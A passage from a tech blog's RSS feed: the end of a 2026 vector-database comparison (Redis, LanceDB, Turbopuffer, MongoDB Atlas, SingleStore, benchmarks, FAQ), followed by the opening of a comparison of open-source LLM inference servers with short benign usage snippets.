<p>The architectural advantage of Redis for vector search is sub-millisecond latency for hot data. Everything lives in RAM. For real-time RAG where you're serving cached context to high-traffic endpoints, Redis can hit latencies that dedicated vector databases can't match.</p>
<p>The trade-off: RAM is expensive. At $2+/GB for in-memory storage versus $0.07/GB for object storage (Turbopuffer's model), the economics diverge quickly at scale. Redis benchmarks at 3.4x higher QPS than Qdrant in Redis's own testing - but at lower recall thresholds. At matched recall rates, the gap narrows considerably.</p>
<p><img src="/images/tools/best-ai-vector-databases-2026-storage.jpg" alt="Physical hard drives representing the storage layer underlying vector database technology">
<em>Vector databases differ most in how they manage the index structures above the storage layer - HNSW, IVF, and LSM-based approaches each make different trade-offs between memory usage, query latency, and update throughput.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="lancedb---best-for-multi-modal-and-columnar-workloads">LanceDB - Best for Multi-Modal and Columnar Workloads</h2>
<p>LanceDB is built on the Lance columnar format and is architecturally different from most alternatives in this list. It handles larger-than-memory datasets gracefully because data lives on disk in a columnar format, not in RAM. That makes it well-suited for multi-modal RAG (text, images, audio, video in the same index) and for workloads where the vector corpus is too large to fit in memory but query latency doesn't need to be sub-millisecond.</p>
<p>LanceDB OSS is free and embedded - it runs inside your Python application process with no separate server. LanceDB Cloud is in public beta with usage-based pricing and $100 in free credits. The cloud offering adds automatic versioning, managed infrastructure, and SQL query support across the managed dataset.</p>
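<p>Because it's embedded, getting started is a few lines of Python with no server process at all. A minimal sketch with toy vectors and placeholder names:</p>
<pre><code class="language-python">import lancedb

# LanceDB is embedded: the "database" is just a directory of Lance files.
db = lancedb.connect("./lance_data")

table = db.create_table(
    "docs",
    data=[
        {"id": 1, "text": "refund policy", "vector": [0.1, 0.3, 0.5]},
        {"id": 2, "text": "shipping terms", "vector": [0.2, 0.1, 0.7]},
    ],
)

# Nearest-neighbour query over the on-disk data; 3-dim vectors for brevity.
print(table.search([0.1, 0.3, 0.6]).limit(2).to_list())
</code></pre>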
<p>Zero-copy versioning (automatic, no extra infrastructure) is a useful feature for ML workflows where you want to roll back to previous dataset snapshots.</p>
<p><strong>Integrations:</strong> LangChain, LlamaIndex.</p>
<hr>
<h2 id="turbopuffer---best-cost-efficiency-at-scale">Turbopuffer - Best Cost Efficiency at Scale</h2>
<p>Turbopuffer is the most architecturally interesting entry in this list. It builds vector search on object storage (S3) as the primary data layer, with a memory and SSD cache sitting in front. The cost difference is significant: incumbents using RAM + 3x SSD for index storage pay roughly $1,600/TB/month; Turbopuffer's S3 + SSD cache model runs $70/TB/month.</p>
<p>This is why Cursor, Anthropic, Notion, Linear, and Superhuman use it. A Cursor co-founder noted they saved &quot;an order of magnitude in costs&quot; after switching their vector database to Turbopuffer.</p>
<p>At the production scale it's operating at - 3.5T+ documents, 10M+ writes/second, 25k+ queries/second - the architecture clearly works.</p>
<p>The trade-off is cold-query latency. When data isn't in the SSD cache, query times are 285-444ms p90. For workloads with uniform query distribution across a large corpus, that's fine. For workloads where cache hit rate is high, warm performance is 10-18ms p90. If your use case has a long tail of infrequently accessed namespaces, cold-cache latency is a real concern.</p>
<p>Pricing: $64/month minimum spend. No free tier.</p>
<p><strong>Hybrid search:</strong> Supported (vector + full-text).</p>
<hr>
<h2 id="elastic-vector-search--opensearch-k-nn">Elastic Vector Search / OpenSearch k-NN</h2>
<p>Both are solid choices when you already run an Elasticsearch or OpenSearch cluster for full-text search and want to add vector capabilities without a new dependency. The integration is natural - vector search and BM25 keyword search run on the same infrastructure, and hybrid search via reciprocal rank fusion works well.</p>
<p>OpenSearch 2.11+ supports hybrid search combining BM25 and vector similarity. Amazon OpenSearch Service pricing is cluster-based (instance hours + storage); dedicated master nodes and data nodes are billed separately, making cost estimation more involved than purpose-built vector databases. AWS also introduced Amazon S3 Vectors in 2026, promising up to 90% lower costs for vector storage in the S3 ecosystem.</p>
<p>Elasticsearch (via Elastic) shows strong performance in filtered vector search benchmarks, though its own comparison against OpenSearch shows Elasticsearch with 60% higher throughput for filtered queries in their testing.</p>
<p>The honest use case: if your team runs Elastic or OpenSearch at scale and you need to add semantic search, don't introduce a separate vector database. If you're starting fresh specifically for vector search, purpose-built options generally offer better QPS/cost at the same recall level.</p>
<hr>
<h2 id="mongodb-atlas-vector-search---best-for-existing-atlas-users">MongoDB Atlas Vector Search - Best for Existing Atlas Users</h2>
<p>Atlas Vector Search is included in your Atlas cluster - it's not a separate product. If you run MongoDB already, semantic search over your documents requires no additional infrastructure. The free tier (M0) includes Vector Search and gives you 512MB storage. The Flex tier scales to 5GB with pay-as-you-go billing capped at roughly $30/month.</p>
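<p>Vector queries run as an aggregation stage. A minimal sketch with PyMongo, assuming an Atlas Vector Search index already exists on the <code>embedding</code> field - the index name, field names, and dimensions are placeholders:</p>
<pre><code class="language-python">from pymongo import MongoClient

client = MongoClient("mongodb+srv://user:pass@cluster.example.mongodb.net")  # placeholder URI
coll = client["mydb"]["articles"]

# $vectorSearch runs as the first stage of an aggregation pipeline and needs an
# Atlas Vector Search index (named "embedding_index" here) on the "embedding" field.
pipeline = [
    {"$vectorSearch": {
        "index": "embedding_index",
        "path": "embedding",
        "queryVector": [0.02] * 768,
        "numCandidates": 200,
        "limit": 10,
    }},
    {"$project": {"title": 1, "score": {"$meta": "vectorSearchScore"}}},
]
for doc in coll.aggregate(pipeline):
    print(doc)
</code></pre>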
<p>The limitation: vector search performance is constrained by your Atlas cluster size. It runs on the same compute as your operational workload, which means a burst of vector queries can affect your transactional performance if you haven't provisioned dedicated search nodes. Atlas does support dedicated Search Nodes (separate compute for search operations) from the M10 tier, which adds cost but isolates the workload.</p>
<p>For teams running MongoDB as their primary database and adding AI features, Atlas Vector Search removes a deployment dependency. For teams building a greenfield vector search system, the pricing model (cluster-based, not vector-optimized) is harder to predict at scale.</p>
<hr>
<h2 id="singlestore---best-for-real-time-analytics--vector-hybrid">SingleStore - Best for Real-Time Analytics + Vector Hybrid</h2>
<p>SingleStore is a distributed SQL database that added HNSW-indexed ANN vector search with a full product quantization implementation. The pitch is different from every other option on this list: you get vector search, full-text search, and high-performance SQL analytics in one system with no data movement between services.</p>
<p>Hybrid filtering in SingleStore uses standard SQL WHERE clauses, JOINs, and aggregations combined with the vector similarity search. There's no separate query language to learn. For applications that need to combine vector similarity with time-series analytics or relational filtering, that consolidation reduces the number of moving parts considerably.</p>
<p>The CEO has publicly argued that purpose-built vector databases will struggle long-term as general-purpose databases with strong vector support become the norm. That's a self-serving position, but it's worth taking seriously at the architecture planning stage.</p>
<p>Pricing is custom (contact sales). A free shared tier exists for evaluation.</p>
<hr>
<h2 id="vectordbbench-performance-summary">VectorDBBench Performance Summary</h2>
<p>The table below reflects VectorDBBench results at 1M vectors (768 dimensions, HNSW index) where available. Numbers vary by configuration and hardware - treat these as directional, not definitive.</p>
<table>
  <thead>
      <tr>
          <th>Database</th>
          <th>Approximate QPS (1M vec)</th>
          <th>Recall@10</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Qdrant</td>
          <td>~1,200</td>
          <td>~99%</td>
          <td>Per Qdrant's own benchmarks</td>
      </tr>
      <tr>
          <td>Milvus</td>
          <td>~900-1,100</td>
          <td>~98%</td>
          <td>Fastest index build time</td>
      </tr>
      <tr>
          <td>Weaviate</td>
          <td>~600-800</td>
          <td>~97%</td>
          <td>Per Qdrant benchmark suite</td>
      </tr>
      <tr>
          <td>Redis</td>
          <td>~1,500+</td>
          <td>~95%</td>
          <td>At lower recall threshold</td>
      </tr>
      <tr>
          <td>pgvector (HNSW)</td>
          <td>~200-400</td>
          <td>~97%</td>
          <td>Depends heavily on Postgres config</td>
      </tr>
      <tr>
          <td>Elasticsearch</td>
          <td>~500-700</td>
          <td>~99%</td>
          <td>10x slower at 10M 96-dim vectors</td>
      </tr>
      <tr>
          <td>Turbopuffer</td>
          <td>~25k total (warm)</td>
          <td>N/A</td>
          <td>Shared infra, warm-cache p90 10ms</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="best-pick-recommendations">Best Pick Recommendations</h2>
<p><strong>Start here for new projects:</strong> If you don't have an existing database that supports vectors and your corpus is under 50M documents, Qdrant cloud is the cleanest starting point. Free cluster, Apache 2.0 open-source, strong filtering, no per-query pricing.</p>
<p><strong>Existing Postgres users:</strong> Add pgvector. The operational simplicity of keeping everything in one system outweighs the performance gap until you're running 50M+ vectors at high QPS.</p>
<p><strong>Enterprise managed cloud:</strong> Weaviate Dedicated or Zilliz Cloud both handle production scale. Weaviate is better if hybrid search quality is critical; Zilliz Cloud is better if you need very high write throughput and billion-scale vector counts.</p>
<p><strong>Cost-sensitive at scale:</strong> Turbopuffer. The S3-native architecture is 10-23x cheaper per TB than RAM-heavy alternatives, and the production track record at Cursor, Notion, and Linear gives it credibility that a newer entrant normally doesn't have.</p>
<p><strong>Already on MongoDB/Elastic/Redis:</strong> Don't add infrastructure. Use the vector search capability built into what you already operate. The marginal performance gain from switching to a purpose-built database rarely justifies the operational cost of adding a new service.</p>
<p>For selecting the right embedding model to pair with any of these databases, the <a href="/leaderboards/rag-benchmarks-leaderboard/">RAG benchmarks leaderboard</a> tracks quality metrics across the full retrieval pipeline.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-vector-database-has-the-best-hybrid-search-in-2026">Which vector database has the best hybrid search in 2026?</h3>
<p>Weaviate has the most mature native hybrid search, fusing BM25 and dense vectors in a single query call. Redis 8.4's FT.HYBRID command is now comparable for in-memory workloads. Qdrant and Milvus both support sparse + dense vector hybrid search.</p>
<h3 id="is-pgvector-good-enough-for-production-rag">Is pgvector good enough for production RAG?</h3>
<p>For most RAG workloads under 20M vectors with moderate query rates, yes. It's not the highest-performance option, but it removes an infrastructure dependency and uses SQL for filtering. Above 50M vectors or at high concurrent QPS, purpose-built databases pull ahead.</p>
<h3 id="how-does-turbopuffer-compare-to-pinecone-on-cost">How does Turbopuffer compare to Pinecone on cost?</h3>
<p>At scale, Turbopuffer is significantly cheaper. Turbopuffer's S3-first storage runs $70/TB/month vs. RAM-heavy alternatives at $1,600/TB/month. Pinecone's read unit pricing becomes expensive when namespace sizes are large and query volumes are high.</p>
<h3 id="whats-the-difference-between-milvus-and-zilliz-cloud">What's the difference between Milvus and Zilliz Cloud?</h3>
<p>Milvus is the Apache 2.0 open-source project you self-host. Zilliz Cloud is the fully managed SaaS version built and operated by the Milvus creators (Zilliz Inc), with additional cloud-specific optimizations and enterprise support.</p>
<h3 id="do-i-need-a-dedicated-vector-database-or-can-i-use-mongodbpostgres">Do I need a dedicated vector database or can I use MongoDB/Postgres?</h3>
<p>It depends on scale and team capacity. For most applications adding AI features to an existing MongoDB or Postgres deployment, the built-in vector search is sufficient and avoids operational overhead. Dedicated vector databases offer better performance at large scale but add another system to operate.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.pinecone.io/pricing/">Pinecone Pricing</a> - Official Pinecone pricing page</li>
<li><a href="https://qdrant.tech/pricing/">Qdrant Pricing</a> - Official Qdrant cloud pricing</li>
<li><a href="https://qdrant.tech/benchmarks/">Qdrant Benchmarks</a> - Open-source vector database benchmark suite</li>
<li><a href="https://weaviate.io/pricing">Weaviate Pricing</a> - Official Weaviate Cloud pricing (updated Oct 2025)</li>
<li><a href="https://zilliz.com/pricing">Zilliz Cloud Pricing</a> - Official Zilliz Cloud pricing</li>
<li><a href="https://turbopuffer.com/blog/turbopuffer">Turbopuffer Architecture</a> - Turbopuffer blog: architecture and performance details</li>
<li><a href="https://redis.io/blog/benchmarking-results-for-vector-databases/">Redis Benchmarking Results</a> - Redis vector database benchmark blog post</li>
<li><a href="https://redis.io/blog/revamping-context-oriented-retrieval-with-hybrid-search-in-redis-84/">Redis 8.4 Hybrid Search</a> - Redis FT.HYBRID announcement</li>
<li><a href="https://github.com/zilliztech/VectorDBBench">VectorDBBench</a> - Open-source benchmark tool (Zilliz / Milvus team)</li>
<li><a href="https://ranksquire.com/2026/03/04/vector-database-pricing-comparison-2026/">Ranksquire Pricing Comparison 2026</a> - Third-party TCO breakdown</li>
<li><a href="https://zilliz.com/blog/zilliz-cloud-oct-2025-update">Zilliz Oct 2025 Update</a> - Tiered storage and pricing changes</li>
<li><a href="https://www.mongodb.com/products/platform/atlas-vector-search">MongoDB Atlas Vector Search</a> - Official MongoDB Atlas Vector Search product page</li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-vector-databases-2026_hu_3ca0356f411f89ce.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-vector-databases-2026_hu_3ca0356f411f89ce.jpg" width="1200" height="675"/></item><item><title>Best Open-Source LLM Inference Servers 2026</title><link>https://awesomeagents.ai/tools/best-open-source-llm-inference-servers-2026/</link><pubDate>Fri, 17 Apr 2026 14:03:34 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-open-source-llm-inference-servers-2026/</guid><description>&lt;p>Picking a LLM inference server used to be easy. You had vLLM, you had TGI, and you picked based on whether you wanted throughput or HuggingFace integration. That decision tree is now a lot more complicated. SGLang has closed the gap - and in many workloads surpassed - vLLM on raw throughput. TGI quietly entered maintenance mode in December 2025. TensorRT-LLM keeps posting the fastest absolute numbers if you can tolerate a 28-minute compilation step per model. LMDeploy, Aphrodite, and MLC-LLM have carved out real niches. And Ray Serve has grown into a full orchestration layer that sits above all of them.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Picking a LLM inference server used to be easy. You had vLLM, you had TGI, and you picked based on whether you wanted throughput or HuggingFace integration. That decision tree is now a lot more complicated. SGLang has closed the gap - and in many workloads surpassed - vLLM on raw throughput. TGI quietly entered maintenance mode in December 2025. TensorRT-LLM keeps posting the fastest absolute numbers if you can tolerate a 28-minute compilation step per model. LMDeploy, Aphrodite, and MLC-LLM have carved out real niches. And Ray Serve has grown into a full orchestration layer that sits above all of them.</p>
<p>This comparison covers eleven frameworks, pulls from H100 benchmarks published in early 2026, and tries to give you an honest decision framework rather than another feature-checkbox table.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>vLLM</strong> is the safest default for new production deployments: 200+ model architectures, active development, Apache 2.0, OpenAI-compatible API out of the box</li>
<li><strong>SGLang</strong> is the throughput leader for workloads with shared prefixes (RAG, multi-turn chat) - roughly 29% faster than vLLM on H100 for Llama 3.1 8B</li>
<li><strong>TensorRT-LLM</strong> posts the best raw numbers but requires 28-minute engine compilation per model - only justified for sustained high-traffic serving of a fixed model</li>
<li><strong>llama.cpp / Ollama</strong> are the right choice for development, CPU-only inference, or low-concurrency internal tooling - not for customer-facing scale</li>
<li><strong>TGI is in maintenance mode</strong> - migrate to vLLM or SGLang for anything new</li>
</ul>
</div>
<h2 id="the-benchmark-baseline">The Benchmark Baseline</h2>
<p>All throughput numbers below come from public H100 SXM5 80GB benchmarks running Meta-Llama 3.3-70B-Instruct in FP8 precision unless noted otherwise. For smaller models (Llama 3.1 8B on H100), the SGLang/LMDeploy lead is wider (roughly 16,200 tok/s vs 12,500 tok/s for vLLM).</p>
<table>
  <thead>
      <tr>
          <th>Server</th>
          <th>Throughput @100 req (tok/s)</th>
          <th>TTFT p50/p95 @100 req (ms)</th>
          <th>Cold Start</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>TensorRT-LLM v1.2</td>
          <td>2,780</td>
          <td>680 / 1,280</td>
          <td>~28 min (compile)</td>
      </tr>
      <tr>
          <td>SGLang v0.5.9</td>
          <td>2,460</td>
          <td>710 / 1,380</td>
          <td>~58 sec</td>
      </tr>
      <tr>
          <td>vLLM v0.18.0</td>
          <td>2,400</td>
          <td>740 / 1,450</td>
          <td>~62 sec</td>
      </tr>
      <tr>
          <td>LMDeploy (Int4, A100)</td>
          <td>700</td>
          <td>lowest tested</td>
          <td>~45 sec</td>
      </tr>
      <tr>
          <td>llama.cpp / Ollama</td>
          <td>~155 @50 conc.</td>
          <td>high variance</td>
          <td>~5 sec</td>
      </tr>
  </tbody>
</table>
<p><em>Hardware: NVIDIA H100 SXM5 80GB (single GPU) for TRT/SGLang/vLLM rows. LMDeploy row: A100 80GB, Llama 3 70B Int4, 100 concurrent users. Ollama row: RTX 4090. Sources: <a href="https://www.spheron.network/blog/vllm-vs-tensorrt-llm-vs-sglang-benchmarks/">Spheron benchmarks</a>, <a href="https://blog.premai.io/vllm-vs-sglang-vs-lmdeploy-fastest-llm-inference-engine-in-2026/">Prem AI comparison</a>.</em></p>
<p><img src="/images/tools/best-open-source-llm-inference-servers-2026-gpu-cluster.jpg" alt="GPU cluster powering LLM inference">
<em>Modern GPU clusters run multiple inference servers simultaneously, making the choice of serving framework a critical infrastructure decision.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="vllm---the-reliable-default">vLLM - The Reliable Default</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/vllm-project/vllm">vllm-project/vllm</a> | <strong>License</strong>: Apache 2.0 | <strong>Latest</strong>: v0.19.0 (Apr 3, 2026)</p>
<p>vLLM started at UC Berkeley and has built up 77k GitHub stars and 2,000+ contributors. It remains the reference implementation for PagedAttention - a KV cache management technique that treats GPU memory like virtual memory, partitioning the cache into fixed-size blocks that can live in non-contiguous memory. The result is less than 4% memory waste under typical workloads, compared to 60-80% fragmentation in naive implementations.</p>
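<p>The serving surface is deliberately simple. A minimal offline-inference sketch - the model name is just an example, and the same checkpoint can instead be exposed over vLLM's OpenAI-compatible HTTP server:</p>
<pre><code class="language-python">from vllm import LLM, SamplingParams

# Offline batched inference; PagedAttention manages the KV cache automatically.
# The model name is just an example - any supported HF checkpoint works.
llm = LLM(model="meta-llama/Llama-3.1-8B-Instruct")
params = SamplingParams(temperature=0.7, max_tokens=128)

outputs = llm.generate(
    ["Explain PagedAttention in one sentence.",
     "Name two benefits of continuous batching."],
    params,
)
for out in outputs:
    print(out.outputs[0].text)
</code></pre>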
<h3 id="strengths">Strengths</h3>
<ul>
<li><strong>Model breadth</strong>: 200+ architectures natively supported from HuggingFace, including decoder-only LLMs, MoE models (DeepSeek-V3, Mixtral), multimodal models (LLaVA, Qwen-VL), and embedding models</li>
<li><strong>Quantization coverage</strong>: FP8, INT4, INT8, GPTQ, AWQ, GGUF, and compressed_tensors - essentially everything</li>
<li><strong>Hardware portability</strong>: NVIDIA GPUs, AMD GPUs, CPUs, TPUs, and specialized accelerators</li>
<li><strong>Speculative decoding</strong>: n-gram, suffix, EAGLE, and DFlash variants supported</li>
<li><strong>API compatibility</strong>: OpenAI-compatible server plus Anthropic Messages API</li>
</ul>
<h3 id="weaknesses">Weaknesses</h3>
<ul>
<li>Cold start around 62 seconds - not ideal for auto-scaling fleets</li>
<li>TTFT p99 is 80% larger than competitors under load in some benchmarks - variance is higher than SGLang</li>
<li>Slightly behind SGLang and TRT-LLM on raw throughput for larger models</li>
</ul>
<h3 id="best-for">Best for</h3>
<p>General-purpose production serving where you need to run multiple model architectures and don't want to maintain separate serving stacks. The ecosystem around vLLM (observability tools, integrations, community support) is unmatched.</p>
<hr>
<h2 id="sglang---the-throughput-leader">SGLang - The Throughput Leader</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/sgl-project/sglang">sgl-project/sglang</a> | <strong>License</strong>: Apache 2.0 | <strong>Latest</strong>: v0.5.10.post1 (Apr 9, 2026)</p>
<p>SGLang is the inference engine that crept up on vLLM's market share by solving a specific problem better: prefix reuse. RadixAttention uses a radix tree data structure to automatically identify and cache shared KV blocks across requests. When multiple users start with the same system prompt, the same document in a RAG pipeline, or the same few-shot examples, those tokens are computed once and reused.</p>
<p>The cache hit rates are dramatic: 85-95% for few-shot workloads vs 15-25% for vLLM's prefix caching, and 75-90% for multi-turn chat vs 10-20% for vLLM. That compounding reuse is why SGLang delivers 3.1x faster inference than vLLM on DeepSeek V3 specifically.</p>
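<p>The practical implication: structure requests so the shared part comes first. A rough sketch against an SGLang server's OpenAI-compatible endpoint - the base URL, port, and model name are placeholders for your own deployment:</p>
<pre><code class="language-python">from openai import OpenAI

# Any OpenAI-compatible client works; base URL and model name are placeholders
# for wherever your SGLang server is listening.
client = OpenAI(base_url="http://localhost:30000/v1", api_key="EMPTY")

SYSTEM = "You are a support agent for ExampleCo. Follow the refund policy strictly."

# Every request shares the same system prompt, so RadixAttention computes those
# prefix KV blocks once and reuses them across all three calls.
for question in ["Where is my order?", "Can I get a refund?", "Do you ship to Norway?"]:
    resp = client.chat.completions.create(
        model="meta-llama/Llama-3.1-8B-Instruct",
        messages=[
            {"role": "system", "content": SYSTEM},
            {"role": "user", "content": question},
        ],
        max_tokens=128,
    )
    print(resp.choices[0].message.content)
</code></pre>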
<h3 id="strengths-1">Strengths</h3>
<ul>
<li><strong>Structured output</strong>: xGrammar backend delivers up to 10x faster JSON decoding than alternatives, with compiled grammars cached in the radix tree for reuse</li>
<li><strong>Scale</strong>: Powers 400,000+ GPUs globally, trillions of tokens daily. Production users include xAI, AMD, NVIDIA, LinkedIn, and Cursor</li>
<li><strong>Multi-GPU</strong>: Tensor, pipeline, expert, and data parallelism</li>
<li><strong>Quantization</strong>: FP4/FP8/INT4/AWQ/GPTQ across NVIDIA GB200/B300/H100 and AMD MI-series</li>
<li><strong>Prefill-decode disaggregation</strong>: Separates the prompt processing phase from token generation for better resource use</li>
</ul>
<h3 id="weaknesses-1">Weaknesses</h3>
<ul>
<li>Smaller community than vLLM (26k stars vs 77k)</li>
<li>Slightly steeper operational learning curve</li>
<li>Fewer supported model architectures than vLLM</li>
</ul>
<h3 id="best-for-1">Best for</h3>
<p>Any workload with shared prefixes: RAG pipelines, document Q&amp;A, multi-turn chat agents, structured JSON extraction. For anything involving <a href="/tools/best-ai-agent-frameworks-2026">AI agent frameworks</a>, SGLang's prefix caching compounds into a significant cost advantage.</p>
<hr>
<h2 id="tensorrt-llm---maximum-performance-maximum-friction">TensorRT-LLM - Maximum Performance, Maximum Friction</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/NVIDIA/TensorRT-LLM">NVIDIA/TensorRT-LLM</a> | <strong>License</strong>: Apache 2.0 | <strong>Latest</strong>: v1.2.0</p>
<p>NVIDIA TensorRT-LLM is the performance ceiling for LLM serving on NVIDIA hardware. The numbers are real: 13% higher throughput than vLLM at 50 concurrent requests, best TTFT across every concurrency level. On H100 and later GPUs, FP8 quantization doubles performance versus FP16. On B200 GPUs, FP4 inference is natively supported.</p>
<p>The cost is compilation. Every new model requires building a TensorRT engine, a process that takes around 28 minutes. After that first compile, subsequent warm starts drop to ~90 seconds. But any model update, weight change, or configuration tweak triggers a full recompile.</p>
<h3 id="strengths-2">Strengths</h3>
<ul>
<li>Highest throughput and lowest TTFT in class at high concurrency</li>
<li>In-flight batching maximizes GPU use</li>
<li>FlashAttention and paged KV caching built in</li>
<li>Best-in-class on NVIDIA hardware including GB200 (FP4 native)</li>
<li>Typically deployed through the Triton Inference Server backend</li>
</ul>
<h3 id="weaknesses-2">Weaknesses</h3>
<ul>
<li>28-minute engine compilation per model - painful for experimentation</li>
<li>NVIDIA-only (no AMD, no CPU, no TPU fallback)</li>
<li>The &quot;open source&quot; label is technically accurate (Apache 2.0) but NVIDIA controls development and the custom kernels make portability a non-starter</li>
</ul>
<h3 id="best-for-2">Best for</h3>
<p>High-volume production deployments where you're running a fixed model at scale and can amortize the compilation overhead. Data centers serving millions of requests per day on H100/B200 fleets. Not recommended if you need to swap models frequently or experiment with architectures.</p>
<hr>
<h2 id="huggingface-tgi---sunsetted">HuggingFace TGI - Sunsetted</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/huggingface/text-generation-inference">huggingface/text-generation-inference</a> | <strong>Status</strong>: Maintenance mode since Dec 11, 2025</p>
<p>TGI pioneered the OpenAI-compatible API wrapper for HuggingFace models and was the default choice for most teams from 2023 through 2025. On December 11, 2025, HuggingFace's Lysandre Debut announced that TGI had entered maintenance mode - only minor bug fixes and documentation updates will be accepted. New features are done.</p>
<p>Under production load, TGI achieved 68-74% GPU use compared to vLLM's 85-92%, and saturated at 50-75 concurrent requests vs vLLM's 100-150. For existing deployments, TGI will continue working. For anything new, migrate.</p>
<p><strong>Migration path</strong>: Drop-in replacement is vLLM or SGLang - both serve the same OpenAI-compatible <code>/v1/chat/completions</code> endpoint.</p>
<hr>
<h2 id="llamacpp-and-ollama---development-tools">llama.cpp and Ollama - Development Tools</h2>
<p><strong>llama.cpp GitHub</strong>: <a href="https://github.com/ggml-org/llama.cpp">ggml-org/llama.cpp</a> | <strong>License</strong>: MIT</p>
<p>llama.cpp runs LLM inference in pure C++ with no GPU required. It supports GGUF quantization from 1.5-bit through 8-bit integer, k-quants (Q4_K_M, Q5_K_S, etc.), and KV cache quantization that cuts memory usage by up to 50% during generation. The built-in <code>llama-server</code> exposes an OpenAI-compatible API with Prometheus metrics, and since late 2025 also supports the Anthropic Messages API.</p>
<p>Ollama wraps llama.cpp in a user-friendly CLI and REST interface, adding model management and a clean API. It's excellent for local development, testing prompt changes, and internal tooling.</p>
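<p>A typical local-development loop is one pulled model plus one HTTP call; this sketch assumes Ollama is running on its default port with a model such as <code>llama3.2</code> already pulled (llama.cpp's <code>llama-server</code> works the same way through its OpenAI-compatible <code>/v1</code> routes):</p>
<pre><code class="language-python"># Sketch: one-shot chat request against a local Ollama instance (default port 11434).
import requests

resp = requests.post(
    "http://localhost:11434/api/chat",
    json={
        "model": "llama3.2",  # any locally pulled model tag
        "messages": [{"role": "user", "content": "Explain GGUF quantization in one sentence."}],
        "stream": False,  # return a single JSON object instead of a token stream
    },
    timeout=120,
)
print(resp.json()["message"]["content"])
</code></pre>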
<p>The production ceiling is real: at 50 concurrent users, Ollama plateaus at roughly 155 tok/s while vLLM maintains 920 tok/s. Response times degrade from 2 seconds to 45+ seconds with just 10 concurrent users. This isn't a criticism - these tools are optimized for a different use case. See our separate <a href="/tools/best-local-llm-tools-2026">local LLM tools comparison</a> for the desktop-first perspective.</p>
<h3 id="best-for-3">Best for</h3>
<p>CPU-only inference, air-gapped environments, developer workstations, and prototyping models before deploying to a GPU cluster.</p>
<hr>
<h2 id="lmdeploy---the-hidden-strong-contender">LMDeploy - The Hidden Strong Contender</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/InternLM/lmdeploy">InternLM/lmdeploy</a> | <strong>License</strong>: Apache 2.0</p>
<p>LMDeploy from the InternLM team runs the TurboMind inference engine (C++) and matches SGLang's throughput on Llama 3.1 8B (~16,100 tok/s on H100). Its standout metric is latency on quantized models: for Int4 inference on A100 80GB running Llama 3 70B at 100 concurrent users, LMDeploy delivers 700 tok/s with the lowest time-to-first-token across all tested engines. The Int4 performance is 2.4x faster than FP16.</p>
<p>LMDeploy supports persistent batch inference, blocked KV cache, dynamic split-and-fuse, and tensor parallelism. The caveat is narrower model coverage than vLLM and a smaller Western community - most documentation and issues are in Chinese.</p>
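<p>A minimal sketch of LMDeploy's Python <code>pipeline</code> API - the model identifier is a placeholder, and quantized (AWQ/Int4) checkpoints load through the same interface:</p>
<pre><code class="language-python"># Sketch: offline batch inference through LMDeploy's TurboMind backend.
# Pointing the pipeline at 4-bit (AWQ) weights is what delivers the Int4
# latency numbers discussed above; FP16 checkpoints load the same way.
from lmdeploy import pipeline

pipe = pipeline("internlm/internlm2_5-7b-chat")  # placeholder model id

responses = pipe([
    "Summarize the trade-offs of Int4 inference.",
    "List three uses of blocked KV caching.",
])
for r in responses:
    print(r.text)
</code></pre>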
<h3 id="best-for-4">Best for</h3>
<p>Teams running InternLM models, or anyone prioritizing Int4 latency on A100/A800 hardware.</p>
<hr>
<h2 id="mlc-llm---cross-platform-compilation">MLC-LLM - Cross-Platform Compilation</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/mlc-ai/mlc-llm">mlc-ai/mlc-llm</a> | <strong>License</strong>: Apache 2.0</p>
<p>MLC-LLM compiles models via Apache TVM to run on CUDA, Vulkan, Metal, and WebGPU. The same compiled artifact runs on Linux, macOS, Windows, iOS, Android, and in-browser via WebGPU. This is the only framework in this list that can serve a model natively on a mobile device or in a browser.</p>
<p>For server-side production throughput, MLC-LLM is not competitive with vLLM or SGLang. Its value is in edge and cross-platform deployment where the runtime can't be NVIDIA-only. It exposes an OpenAI-compatible REST API and supports FP8/INT4/AWQ/GPTQ quantization.</p>
<h3 id="best-for-5">Best for</h3>
<p>Edge inference, mobile deployment, browser-based private AI applications, cross-platform CI/CD pipelines.</p>
<hr>
<h2 id="aphrodite-engine---extended-quantization-for-creative-ai">Aphrodite Engine - Extended Quantization for Creative AI</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/aphrodite-engine/aphrodite-engine">aphrodite-engine/aphrodite-engine</a> | <strong>License</strong>: AGPL-3.0</p>
<p>Aphrodite is a vLLM fork maintained by the PygmalionAI team, tuned for creative writing and roleplay use cases. Its unique value is quantization breadth: AQLM, AutoRound, AWQ, BitNet, Bitsandbytes, EETQ, GGUF, GPTQ, QuIP#, SqueezeLLM, Marlin, FP2 through FP12, NVIDIA ModelOpt, TorchAO, VPTQ, and MXFP4. It also adds a KoboldAI-compatible API layer and Mirostat sampling.</p>
<p>For general production serving, stick with upstream vLLM - Aphrodite's advantages are niche. But if you need FP2 quantization or KoboldAI API compatibility, it's the only serious option.</p>
<hr>
<h2 id="deepspeed-mii---microsofts-inference-layer">DeepSpeed-MII - Microsoft's Inference Layer</h2>
<p><strong>GitHub</strong>: <a href="https://github.com/deepspeedai/DeepSpeed-MII">deepspeedai/DeepSpeed-MII</a> | <strong>License</strong>: Apache 2.0</p>
